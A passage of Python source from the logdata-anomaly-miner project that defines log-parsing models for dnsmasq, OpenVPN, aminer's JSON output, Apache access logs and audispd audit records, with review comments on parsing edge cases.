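            FixedDataModelElement("port", b"#53"),
            OptionalMatchModelElement("opt_domain", SequenceModelElement("for_domain", [
                FixedDataModelElement("for_domain", b" for domain "),
                AnyByteDataModelElement("domain")
            ]))
        ]),
        SequenceModelElement("cached", [
            FixedDataModelElement("cached", b"cached "),
            DelimitedDataModelElement("domain", b" "),
            FixedDataModelElement("is", b" is "),
            # Same reasoning as in the "reply" branch: the cached answer need not be an address.
            VariableByteDataModelElement("ip", alphabet)
        ]),
        SequenceModelElement("reducing", [
            FixedDataModelElement("reducing", b"reducing DNS packet size for nameserver "),
            IpAddressDataModelElement("ip"),
            FixedDataModelElement("is", b" to "),
            DecimalIntegerValueModelElement("size")
        ]),
        SequenceModelElement("compile_time_options", [
            FixedDataModelElement("compile_time_options", b"compile time options: "),
            AnyByteDataModelElement("options")
        ]),
        SequenceModelElement("version", [
            FixedDataModelElement("version", b"started, version "),
            DecimalFloatValueModelElement("version_nr"),
            FixedDataModelElement("cachesize", b" cachesize "),
            DecimalIntegerValueModelElement("size")
        ]),
        # The address count was previously hard-coded as "7 addresses"; dnsmasq logs the
        # actual number of entries read, so parse it as an integer instead.
        SequenceModelElement("read_hosts", [
            FixedDataModelElement("read_hosts_str", b"read /etc/hosts - "),
            DecimalIntegerValueModelElement("addresses"),
            FixedDataModelElement("addresses_str", b" addresses")
        ]),
        FixedDataModelElement("failed_access", b"failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory"),
        # NOTE(review): this only matches the fixed prefix; whatever follows "is " is not
        # consumed by the model. Confirm that is intended for this message.
        FixedDataModelElement("version.bind", b"config version.bind is "),
        FixedDataModelElement("sigterm", b"exiting on receipt of SIGTERM"),
    ])

    model = SequenceModelElement("model", [
        # Timestamps in the dataset carry no year; start_year anchors them to 2022.
        DateTimeModelElement("time", b"%b %d %H:%M:%S ", start_year=2022),
        DelimitedDataModelElement("service", b"["),
        FixedDataModelElement("br_open", b"["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("br_close", b"]: "),
        message_types
    ])
    return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/OpenVpnParsingModel.py000066400000000000000000000271131437606560100327540ustar00rootroot00000000000000from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement 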
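import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.HexStringModelElement import HexStringModelElement


def get_model():
    """Return a model to parse OpenVPN logs from the AIT-LDS2.

    Each line starts with a "%Y-%m-%d %H:%M:%S " timestamp, an optional "<user>/"
    prefix, the peer address as "<ip>:<port>", and then exactly one of the message
    branches listed under "fm". TLS errors, verification results and peer-connection
    events are the branches a defender would typically watch for repeated failures
    from a single peer.

    Returns:
        SequenceModelElement: root element of the parser model.
    """
    # " peer info: IV_<KEY>=<value>" lines announced by the client.
    peer_info = SequenceModelElement("peer_info", [
        FixedDataModelElement("peer_info_str", b" peer info: IV_"),
        FirstMatchModelElement("fm", [
            SequenceModelElement("version", [
                FixedDataModelElement("version_str", b"VER="),
                AnyByteDataModelElement("version")
            ]),
            SequenceModelElement("platform", [
                FixedDataModelElement("platform_str", b"PLAT="),
                AnyByteDataModelElement("platform")
            ]),
            SequenceModelElement("protocol", [
                FixedDataModelElement("protocol_str", b"PROTO="),
                DecimalIntegerValueModelElement("protocol")
            ]),
            SequenceModelElement("lz", [
                FixedWordlistDataModelElement("lz_str", [b"LZ4=", b"LZ4v2=", b"LZO="]),
                DecimalIntegerValueModelElement("lz")
            ]),
            SequenceModelElement("comp_stub", [
                FixedWordlistDataModelElement("comp_stub_str", [b"COMP_STUB=", b"COMP_STUBv2="]),
                # NOTE(review): element id "protocol" here looks copied from the PROTO branch;
                # kept because renaming changes the match path.
                DecimalIntegerValueModelElement("protocol")
            ]),
            SequenceModelElement("tcpnl", [
                FixedDataModelElement("tcpnl_str", b"TCPNL="),
                DecimalIntegerValueModelElement("tcpnl")
            ]),
            SequenceModelElement("ncp", [
                FixedDataModelElement("ncp_str", b"NCP="),
                DecimalIntegerValueModelElement("ncp")
            ]),
        ])
    ])

    communication = SequenceModelElement("communication", [
        FixedWordlistDataModelElement("direction", [b" Outgoing Data", b" Incoming Data", b" Control"]),
        FixedDataModelElement("data_channel_str", b" Channel: "),
        AnyByteDataModelElement("msg")
    ])

    # " VERIFY KU OK" / " VERIFY EKU OK" — tried before the "VERIFY OK: ..." form below.
    verify_ku = SequenceModelElement("verify", [
        FixedDataModelElement("verify_str", b" VERIFY "),
        FixedWordlistDataModelElement("type", [b"KU", b"EKU"]),
        FixedDataModelElement("ok_str", b" OK")
    ])

    # " VERIFY OK: depth=..., C=..., ..." — a comma-separated list of certificate attributes.
    verify_ok = SequenceModelElement("verify", [
        FixedDataModelElement("verify_str", b" VERIFY OK: "),
        RepeatedElementDataModelElement("cert_data", SequenceModelElement("seq", [
            FixedWordlistDataModelElement("attribute", [b"depth", b"ST", b"L", b"O", b"CN", b"C", b"emailAddress"]),
            FixedDataModelElement("equals_sign", b"="),
            FirstMatchModelElement("fm", [
                SequenceModelElement("data", [
                    DelimitedDataModelElement("data", b","),
                    FixedDataModelElement("sp", b", ")
                ]),
                AnyByteDataModelElement("data")
            ]),
        ]))
    ])

    tls = SequenceModelElement("tls", [
        FixedDataModelElement("tls_str", b" TLS: "),
        FirstMatchModelElement("fm", [
            # NOTE(review): "sec", "bytes", "pkts" and "slash" each occur twice in this
            # sequence, so the two values share one match path. Kept as-is to preserve paths.
            SequenceModelElement("soft_reset", [
                FixedDataModelElement("soft_reset_str", b"soft reset sec="),
                DecimalIntegerValueModelElement("sec"),
                FixedDataModelElement("slash", b"/"),
                DecimalIntegerValueModelElement("sec"),
                FixedDataModelElement("bytes_str", b" bytes="),
                DecimalIntegerValueModelElement("bytes"),
                FixedDataModelElement("slash", b"/"),
                DecimalIntegerValueModelElement("bytes", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL),
                FixedDataModelElement("pkts_str", b" pkts="),
                DecimalIntegerValueModelElement("pkts"),
                FixedDataModelElement("slash", b"/"),
                DecimalIntegerValueModelElement("pkts")
            ]),
            SequenceModelElement("initial_packet", [
                FixedDataModelElement("initial_packet_str", b"Initial packet from [AF_INET]"),
                IpAddressDataModelElement("from_ip"),
                FixedDataModelElement("colon", b":"),
                DecimalIntegerValueModelElement("port"),
                FixedDataModelElement("sid_str", b", sid="),
                HexStringModelElement("sid1"),
                FixedDataModelElement("sp", b" "),
                HexStringModelElement("sid2")
            ]),
            SequenceModelElement("move_session", [
                FixedDataModelElement("move_session_str", b"move_session: dest="),
                DelimitedDataModelElement("dest", b" "),
                FixedDataModelElement("src_str", b" src="),
                DelimitedDataModelElement("src", b" "),
                FixedDataModelElement("reinit_src_str", b" reinit_src="),
                DecimalIntegerValueModelElement("reinit_src")
            ])
        ])
    ])

    tls_error = SequenceModelElement("tls_error", [
        FixedDataModelElement("error_str", b" TLS Error: "),
        FirstMatchModelElement("fm", [
            # The timeout was previously hard-coded as "60 seconds"; OpenVPN prints the
            # configured handshake window, so parse it as an integer instead.
            SequenceModelElement("negotiation_failed", [
                FixedDataModelElement("negotiation_failed_str", b"TLS key negotiation failed to occur within "),
                DecimalIntegerValueModelElement("seconds"),
                FixedDataModelElement("negotiation_failed_str2", b" seconds (check your network connectivity)")
            ]),
            FixedDataModelElement("handshake_failed", b"TLS handshake failed")
        ])
    ])

    # "primary virtual IP for <name>/<ip>:<port>: <ip>" appears under both MULTI: and MULTI_sva:,
    # so one instance is shared by both branches (the model elements hold no match state).
    # NOTE(review): "colon" is used twice in this sequence, so both separators share a path.
    primary_virtual_ip = SequenceModelElement("primary", [
        FixedDataModelElement("primary_str", b"primary virtual IP for "),
        DelimitedDataModelElement("name", b"/"),
        FixedDataModelElement("slash", b"/"),
        IpAddressDataModelElement("ip1"),
        FixedDataModelElement("colon", b":"),
        DecimalIntegerValueModelElement("port"),
        FixedDataModelElement("colon", b": "),
        IpAddressDataModelElement("ip2")
    ])

    multi = SequenceModelElement("multi", [
        FixedDataModelElement("multi_str", b" MULTI: "),
        FirstMatchModelElement("fm", [
            SequenceModelElement("learn", [
                FixedDataModelElement("learn_str", b"Learn: "),
                IpAddressDataModelElement("ip1"),
                FixedDataModelElement("arrow", b" -> "),
                DelimitedDataModelElement("name", b"/"),
                FixedDataModelElement("slash", b"/"),
                IpAddressDataModelElement("ip2"),
                FixedDataModelElement("colon", b":"),
                DecimalIntegerValueModelElement("port")
            ]),
            primary_virtual_ip,
        ])
    ])

    multi_sva = SequenceModelElement("multi_sva", [
        FixedDataModelElement("multi_str", b" MULTI_sva: "),
        FirstMatchModelElement("fm", [
            SequenceModelElement("pool_returned", [
                FixedDataModelElement("pool_returned_str", b"pool returned IPv4="),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("ipv6_str", b", IPv6="),
                FirstMatchModelElement("fm", [
                    FixedDataModelElement("not_enabled", b"(Not enabled)"),
                    IpAddressDataModelElement("ipv6", ipv6=True)
                ])
            ]),
            primary_virtual_ip,
        ])
    ])

    # " [<name>] ..." lines carrying the common name of the connecting peer.
    activity = SequenceModelElement("activity", [
        FixedDataModelElement("open_bracket", b" ["),
        DelimitedDataModelElement("name", b"]"),
        FixedDataModelElement("close_bracket", b"] "),
        FirstMatchModelElement("fm", [
            FixedDataModelElement("inactivity_timeout", b"Inactivity timeout (--ping-restart), restarting"),
            SequenceModelElement("peer_conn_initiated", [
                FixedDataModelElement("peer_conn_initiated_str", b"Peer Connection Initiated with [AF_INET]"),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("colon", b":"),
                DecimalIntegerValueModelElement("port")
            ]),
        ])
    ])

    sent_control = SequenceModelElement("sent_control", [
        FixedDataModelElement("sent_control_str", b" SENT CONTROL ["),
        DelimitedDataModelElement("name", b"]"),
        FixedDataModelElement("bracket", b"]: "),
        AnyByteDataModelElement("msg")
    ])

    model = SequenceModelElement("model", [
        DateTimeModelElement("datetime", b"%Y-%m-%d %H:%M:%S "),
        # Optional "<user>/" prefix in front of the peer address.
        OptionalMatchModelElement("user", SequenceModelElement("user", [
            DelimitedDataModelElement("user", b"/"),
            FixedDataModelElement("slash", b"/")
        ])),
        IpAddressDataModelElement("ip"),
        FixedDataModelElement("colon", b":"),
        DecimalIntegerValueModelElement("port"),
        FirstMatchModelElement("fm", [
            peer_info,
            FixedDataModelElement("validating", b" Validating certificate extended key usage"),
            communication,
            verify_ku,
            verify_ok,
            tls,
            tls_error,
            multi,
            multi_sva,
            activity,
            sent_control,
            FixedDataModelElement("client_auth_expected", b" ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication"),
            FixedDataModelElement("push", b" PUSH: Received control message: 'PUSH_REQUEST'"),
            FixedDataModelElement("SIGUSR1", b" SIGUSR1[soft,ping-restart] received, client-instance restarting")
        ])
    ])
    return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/000077500000000000000000000000001437606560100265015ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/AminerParsingModel.py000066400000000000000000000244551437606560100326050ustar00rootroot00000000000000"""This module defines a parser for the aminer."""
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement 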
import DecimalFloatValueModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.JsonModelElement import JsonModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model() -> JsonModelElement:
    """
    Return the parsing model for the JSON event output that the aminer itself emits.

    The model is one JsonModelElement rooted at "aminer". The trailing "_" argument is passed as the
    key prefix; keys starting with "_" are presumably treated as optional by JsonModelElement -- confirm
    there before relying on it. The string sentinels "ALLOW_ALL", "ALLOW_ALL_KEYS" and "EMPTY_ARRAY"
    are likewise interpreted by JsonModelElement (wildcard value, wildcard keys, empty list as far as
    their names suggest); verify their exact semantics in that class.

    Security note: this parser consumes output produced by aminer, so a schema mismatch surfaces as
    self-generated unparsed atoms (noise in detection), not as an injection path. Keep it in sync with
    the JSON writers when their output format changes.

    @return the JsonModelElement describing aminer's own JSON output.
    """
    # Alphabets for free-text fields. NOTE(review): `alphabet` already ends in "\n", so
    # `alphabet_with_newline` below admits the same byte set; confirm the newline in `alphabet`
    # is intended, since it presumably lets multi-line content through fields such as "Message".
    name_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    alphabet = "!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[] °§ß–\n".encode()
    alphabet_with_newline = alphabet + b"\n"
    filename_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ._-/"
    path = VariableByteDataModelElement("path", filename_alphabet)
    apostrophe = FixedDataModelElement("apostrophe", b"'")
    # One or more quoted paths, each optionally followed by a comma: 'p1','p2'
    repeated_path = RepeatedElementDataModelElement("repeated", SequenceModelElement("sequence", [
        apostrophe, path, apostrophe, OptionalMatchModelElement("optional", FixedDataModelElement("comma", b","))
    ]))
    # Correlation rule rendering: ( <paths> )->( <paths> ) or ( <paths> )<-( <paths> )
    rule = SequenceModelElement("rule", [
        FixedDataModelElement("open_bracket", b"("),
        repeated_path,
        FixedWordlistDataModelElement("close_bracket", [b")->(", b")<-("]),
        repeated_path,
        FixedDataModelElement("close_bracket", b")")
    ])
    # "<actual>/<expected>" integer pairs; both sequences use the same child element ids.
    expected = SequenceModelElement("expected", [
        DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected")
    ])
    observed = SequenceModelElement("observed", [
        DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected")
    ])
    # Shared for "HasOutlierBinsFlag" and "BinDefinition.OutlierBinsFlag".
    has_outlier_bins_flag = FixedWordlistDataModelElement("has_outlier_bins_flag", [b"true", b"false"])
    model = JsonModelElement("aminer", {
        "_AnalysisComponent": {
            # Either a numeric component id or the JSON literal null.
            "AnalysisComponentIdentifier": FirstMatchModelElement("first", [
                DecimalIntegerValueModelElement("component_id"), FixedDataModelElement("null", b"null")
            ]),
            "AnalysisComponentType": VariableByteDataModelElement("component_type", name_alphabet),
            "AnalysisComponentName": VariableByteDataModelElement("component_name", alphabet),
            "Message": VariableByteDataModelElement("message", alphabet),
            "_PersistenceFileName": VariableByteDataModelElement("persistence_file_name", filename_alphabet),
            "_TrainingMode": FixedWordlistDataModelElement("training_mode", [b"true", b"false"]),
            "_AffectedLogAtomPaths": [VariableByteDataModelElement("affected_log_atom_paths", alphabet)],
            "_AffectedLogAtomValues": [VariableByteDataModelElement("affected_log_atom_value", alphabet)],
            "_Metadata": {
                "TimeFirstOccurrence": DecimalFloatValueModelElement("time_first_occurrence"),
                "TimeLastOccurrence": DecimalFloatValueModelElement("time_last_occurrence"),
                "NumberOfOccurrences": DecimalIntegerValueModelElement("number_of_occurrences")
            },
            # Arbitrary keys are accepted here; the parsed atom's own key set is not known in advance.
            "_ParsedLogAtom": {"ALLOW_ALL_KEYS": VariableByteDataModelElement("allow_all_keys", alphabet)},
            "_FeatureList": [{
                "Rule": {
                    "type": VariableByteDataModelElement("type", name_alphabet),
                    "path": path,
                    "_value": VariableByteDataModelElement("value", alphabet),
                    "match_action": VariableByteDataModelElement("match_action", filename_alphabet),
                    "log_total": DecimalIntegerValueModelElement("log_total"),
                    "log_success": DecimalIntegerValueModelElement("log_success")
                },
                "Index": DecimalIntegerValueModelElement("index"),
                "CreationTime": DecimalFloatValueModelElement("creation_time"),
                "LastTriggerTime": DecimalFloatValueModelElement("last_trigger_time"),
                "TriggerCount": DecimalIntegerValueModelElement("trigger_count")
            }],
            "_AnalysisStatus": VariableByteDataModelElement("analysis_status", alphabet),
            "_TotalRecords": DecimalIntegerValueModelElement("total_records"),
            "_HistogramData": [{
                "TotalElements": DecimalIntegerValueModelElement("total_elements"),
                "BinnedElements": DecimalIntegerValueModelElement("binned_elements"),
                "HasOutlierBinsFlag": has_outlier_bins_flag,
                "Bins": {"ALLOW_ALL_KEYS": DecimalIntegerValueModelElement("bin")},
                "BinDefinition": {
                    "Type": FixedWordlistDataModelElement("type", [b"ModuloTimeBinDefinition", b"LinearNumericBinDefinition"]),
                    "LowerLimit": DecimalIntegerValueModelElement("lower_limit"),
                    "BinSize": DecimalIntegerValueModelElement("bin_size"),
                    "BinCount": DecimalIntegerValueModelElement("bin_count"),
                    "OutlierBinsFlag": has_outlier_bins_flag,
                    # Bin names look like "[<int>-<int>]"; an open lower or upper end is written as "...".
                    "BinNames": [
                        SequenceModelElement("bin_names", [
                            FirstMatchModelElement("first", [
                                SequenceModelElement("lower", [
                                    FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("value")
                                ]),
                                FixedDataModelElement("dots", b"...")
                            ]),
                            FixedDataModelElement("hyphen", b"-"),
                            FirstMatchModelElement("first", [
                                SequenceModelElement("upper", [
                                    DecimalIntegerValueModelElement("value"), FixedDataModelElement("close_bracket", b"]")
                                ]),
                                FixedDataModelElement("dots", b"...")
                            ]),
                        ])
                    ],
                    "ExpectedBinRatio": DecimalFloatValueModelElement("expected_bin_ratio"),
                    "_ModuloValue": DecimalIntegerValueModelElement("modulo_value"),
                    "_TimeUnit": DecimalIntegerValueModelElement("time_unit")
                },
                "PropertyPath": VariableByteDataModelElement("property_path", filename_alphabet),
            }],
            "_ReportInterval": DecimalIntegerValueModelElement("report_interval"),
            "_ResetAfterReportFlag": FixedWordlistDataModelElement("reset_after_report_flag", [b"true", b"false"]),
            "_MissingPaths": [VariableByteDataModelElement("missing_paths", alphabet)],
            "_AnomalyScores": [{
                "Path": path,
                "AnalysisData": {
                    "New": {
                        "N": DecimalIntegerValueModelElement("n"),
                        "Avg": DecimalFloatValueModelElement("avg"),
                        "Var": DecimalFloatValueModelElement("var")
                    },
                    "Old": {
                        "N": DecimalIntegerValueModelElement("n"),
                        "Avg": DecimalFloatValueModelElement("avg"),
                        "Var": DecimalFloatValueModelElement("var")
                    }
                }
            }],
            "_MinBinElements": DecimalIntegerValueModelElement("min_bin_elements"),
            "_MinBinTime": DecimalIntegerValueModelElement("min_bin_time"),
            "_DebugMode": FixedWordlistDataModelElement("debug_mode", [b"true", b"false"]),
            "_Rule": {
                "RuleId": VariableByteDataModelElement("id", filename_alphabet),
                "MinTimeDelta": DecimalIntegerValueModelElement("min_time_delta"),
                "MaxTimeDelta": DecimalIntegerValueModelElement("max_time_delta"),
                "ArtefactMatchParameters": [
                    path
                ],
                # Sentinel strings: these histories are expected to be serialised as empty arrays.
                "HistoryAEvents": "EMPTY_ARRAY",
                "HistoryBEvents": "EMPTY_ARRAY",
                "LastTimestampSeen": DecimalFloatValueModelElement("last_timestamp_seen"),
                "correlation_history": {
                    "MaxItems": DecimalIntegerValueModelElement("max_items"),
                    "History": [
                        VariableByteDataModelElement("value", alphabet)
                    ]
                }
            },
            "_CheckResult": [VariableByteDataModelElement("value", alphabet_with_newline)],
            "_NewestTimestamp": DecimalFloatValueModelElement("newest_timestamp")
        },
        "_TotalRecords": DecimalIntegerValueModelElement("total_records"),
        # Any value is accepted for TypeInfo.
        "_TypeInfo": "ALLOW_ALL",
        "_RuleInfo": {
            "Rule": rule,
            "Expected": expected,
            "Observed": observed
        },
        "_LogData": {
            "RawLogData": [VariableByteDataModelElement("raw_log_data", alphabet)],
            "Timestamps": [DecimalFloatValueModelElement("timestamp")],
            "DetectionTimestamp": DecimalFloatValueModelElement("detection_timestamp"),
            "LogLinesCount": DecimalIntegerValueModelElement("lines_count"),
            "_AnnotatedMatchElement": VariableByteDataModelElement("annotated_match_element", alphabet_with_newline),
        },
        # Keyed by an arbitrary name (presumably the log source); each entry carries two counters.
        "_StatusInfo": {"ALLOW_ALL_KEYS": {
            "CurrentProcessedLines": DecimalIntegerValueModelElement("current_processed_lines"),
            "TotalProcessedLines": DecimalIntegerValueModelElement("total_processed_lines")
        }},
        "_FromTime": DecimalFloatValueModelElement("from_time"),
        "_ToTime": DecimalFloatValueModelElement("to_time"),
        "_DebugLog": [OptionalMatchModelElement("optional", VariableByteDataModelElement("debug_log", alphabet))]
    }, "_")
    return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py000066400000000000000000000054541437606560100323470ustar00rootroot00000000000000
"""Parsing model for the apache2 access.log in common log format, with the optional combined-format suffix."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement


def get_model() -> SequenceModelElement:
    """
    Return a parser for apache2 access.log.

    The model matches one line of the form
        host ident user [time] "request" status size
    optionally followed by the combined-format suffix
        "referer" "user_agent"
    (the OptionalMatchModelElement named "combined").

    Security-relevant caveats for the attacker-controlled fields (request target, referer, user agent):
    they are delimited by a space or a double quote with backslash as the escape character, so the model
    relies on Apache's own escaping of embedded quotes and non-printable bytes in those fields -- confirm
    the server's escaping behaviour matches before trusting the field boundaries.

    NOTE(review): `size` is a plain decimal integer, but the CLF directive `%b` writes "-" when no body
    bytes were sent (e.g. 304 responses); such lines do not match this model. Accepting "-" would require
    wrapping `size` in a FirstMatchModelElement, which changes the match path below "accesslog" -- coordinate
    with detector configurations before changing it. Likewise, requests using a method outside the fixed
    wordlist below do not match; presumably they then surface as unparsed atoms.

    @return the SequenceModelElement for one access log line.
    """
    alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-:"
    # The leading "[" is part of the time format; the closing "]" is consumed by "sp3" below.
    new_time_model = DateTimeModelElement("time", b"[%d/%b/%Y:%H:%M:%S%z")
    host_name_model = VariableByteDataModelElement("host", alphabet)
    identity_model = VariableByteDataModelElement("ident", alphabet)
    # Remote user: "-" when absent is covered because "-" is in this alphabet.
    user_name_model = VariableByteDataModelElement("user", b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-")
    # Either a bare "-" (malformed/empty request line) or METHOD SP target SP version.
    request_method_model = FirstMatchModelElement("fm", [
        FixedDataModelElement("dash", b"-"),
        SequenceModelElement("request", [
            FixedWordlistDataModelElement("method", [
                b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH"]),
            FixedDataModelElement("sp5", b" "),
            # Request target up to the next space; "\" escapes the delimiter.
            DelimitedDataModelElement("request", b" ", b"\\"),
            FixedDataModelElement("sp6", b" "),
            # Protocol version runs up to the closing quote of the request field.
            DelimitedDataModelElement("version", b'"'),
        ])
    ])
    status_code_model = DecimalIntegerValueModelElement("status")
    # See the NOTE(review) in the docstring about "-" sizes.
    size_model = DecimalIntegerValueModelElement("size")
    whitespace_str = b" "
    model = SequenceModelElement("accesslog", [
        host_name_model,
        FixedDataModelElement("sp0", whitespace_str),
        identity_model,
        FixedDataModelElement("sp1", whitespace_str),
        user_name_model,
        FixedDataModelElement("sp2", whitespace_str),
        new_time_model,
        FixedDataModelElement("sp3", b'] "'),
        request_method_model,
        FixedDataModelElement("sp6", b'" '),
        status_code_model,
        FixedDataModelElement("sp7", whitespace_str),
        size_model,
        # Combined log format appends quoted referer and user agent; both are optional as a unit.
        OptionalMatchModelElement("combined", SequenceModelElement("combined", [
            FixedDataModelElement("sp9", b' "'),
            DelimitedDataModelElement("referer", b'"', b"\\"),
            FixedDataModelElement("sp10", b'" "'),
            DelimitedDataModelElement("user_agent", b'"', b"\\"),
            FixedDataModelElement("sp11", b'"')
        ]))
    ])
    return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/AudispdParsingModel.py000066400000000000000000001400151437606560100327520ustar00rootroot00000000000000
"""This module contains functions and classes to create the parsing model."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.HexStringModelElement import HexStringModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.SequenceModelElement import 
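SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


def get_model():
    """Return a model to parse a audispd message logged via syslog after any standard logging preamble, e.g. from syslog."""

    class ExecArgumentDataModelElement(ModelElementInterface):
        """
        Helper element for the (encoded) argument strings found in audit records (EXECVE a<n>, CWD, PATH name,
        PROCTITLE, OBJ_PID ocomm, ANOM_ABEND comm/reason).

        Three encodings are accepted:
          * a double-quoted string: the bytes between the quotes are the value;
          * the literal (null): the value is None;
          * a run of upper-case hex digits: decoded pairwise into raw bytes.

        Security note: these fields are attacker-controlled (they come from argv, process titles and file
        names). The decoded value may contain any byte, including quotes, whitespace and newlines, so
        downstream consumers must not treat it as printable or as safely delimited text.
        """

        def get_match_element(self, target_path: str, match_context):
            """
            Find the maximum number of bytes belonging to an exec argument.

            @param target_path the path of the enclosing element; the result path is target_path/element_id.
            @param match_context the context whose match_data is consumed; it is advanced only on success.
            @return a MatchElement when at least two bytes were found including the delimiters, None otherwise.
            Empty remaining data, an unterminated quoted string, an odd number of hex digits and a run of
            zero hex digits are all rejected rather than reported as a (possibly empty) match.
            """
            data = match_context.match_data
            # An empty remainder is "no match"; the original indexed data[0] here and raised IndexError.
            if not data:
                return None
            match_len = 0
            match_value = b""
            if data[0] == ord(b'"'):
                # Quoted form: the closing quote is searched from index 1 and consumed as well.
                match_len = data.find(b'"', 1)
                if match_len == -1:
                    return None
                match_value = data[1:match_len]
                match_len += 1
            elif data.startswith(b"(null)"):
                match_len = 6
                match_value = None
            else:
                # Must be upper case hex encoded: decode pairs of nibbles until the first non-hex byte.
                next_value = -1
                for d_byte in data:
                    if 0x30 <= d_byte <= 0x39:
                        d_byte -= 0x30
                    elif 0x41 <= d_byte <= 0x46:
                        d_byte -= 0x37
                    else:
                        break
                    if next_value == -1:
                        next_value = (d_byte << 4)
                    else:
                        match_value += bytearray(((next_value | d_byte),))
                        next_value = -1
                    match_len += 1
                # A dangling high nibble means an odd digit count: malformed.
                if next_value != -1:
                    return None
                # No hex digit at all: nothing was consumed, so this is not a match. Returning a
                # zero-length match here would let malformed input pass the enclosing sequence silently.
                if match_len == 0:
                    return None
            match_data = data[:match_len]
            match_context.update(match_data)
            return MatchElement(f"{target_path}/{self.element_id}", match_data, match_value, None)

    pam_status_word_list = FixedWordlistDataModelElement("status", [b"failed", b"success"])
    # Fixed separators shared by many record types below.
    pid = b" pid="
    uid = b" uid="
    auid = b" auid="
    gid = b" gid="
    ses = b" ses="
    exe = b' exe="'
    hostname = b'" hostname='
    hostname1 = b'" (hostname='
    addr = b" addr="
    addr1 = b", addr="
    terminal = b" terminal="
    terminal1 = b", terminal="
    res = b" res="
    exe1 = b'" exe="'
    subj = b" subj="
    comm = b" comm="
    reason = b" reason="
    dev = b" dev="
    sig = b" sig="
    alphabet = 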
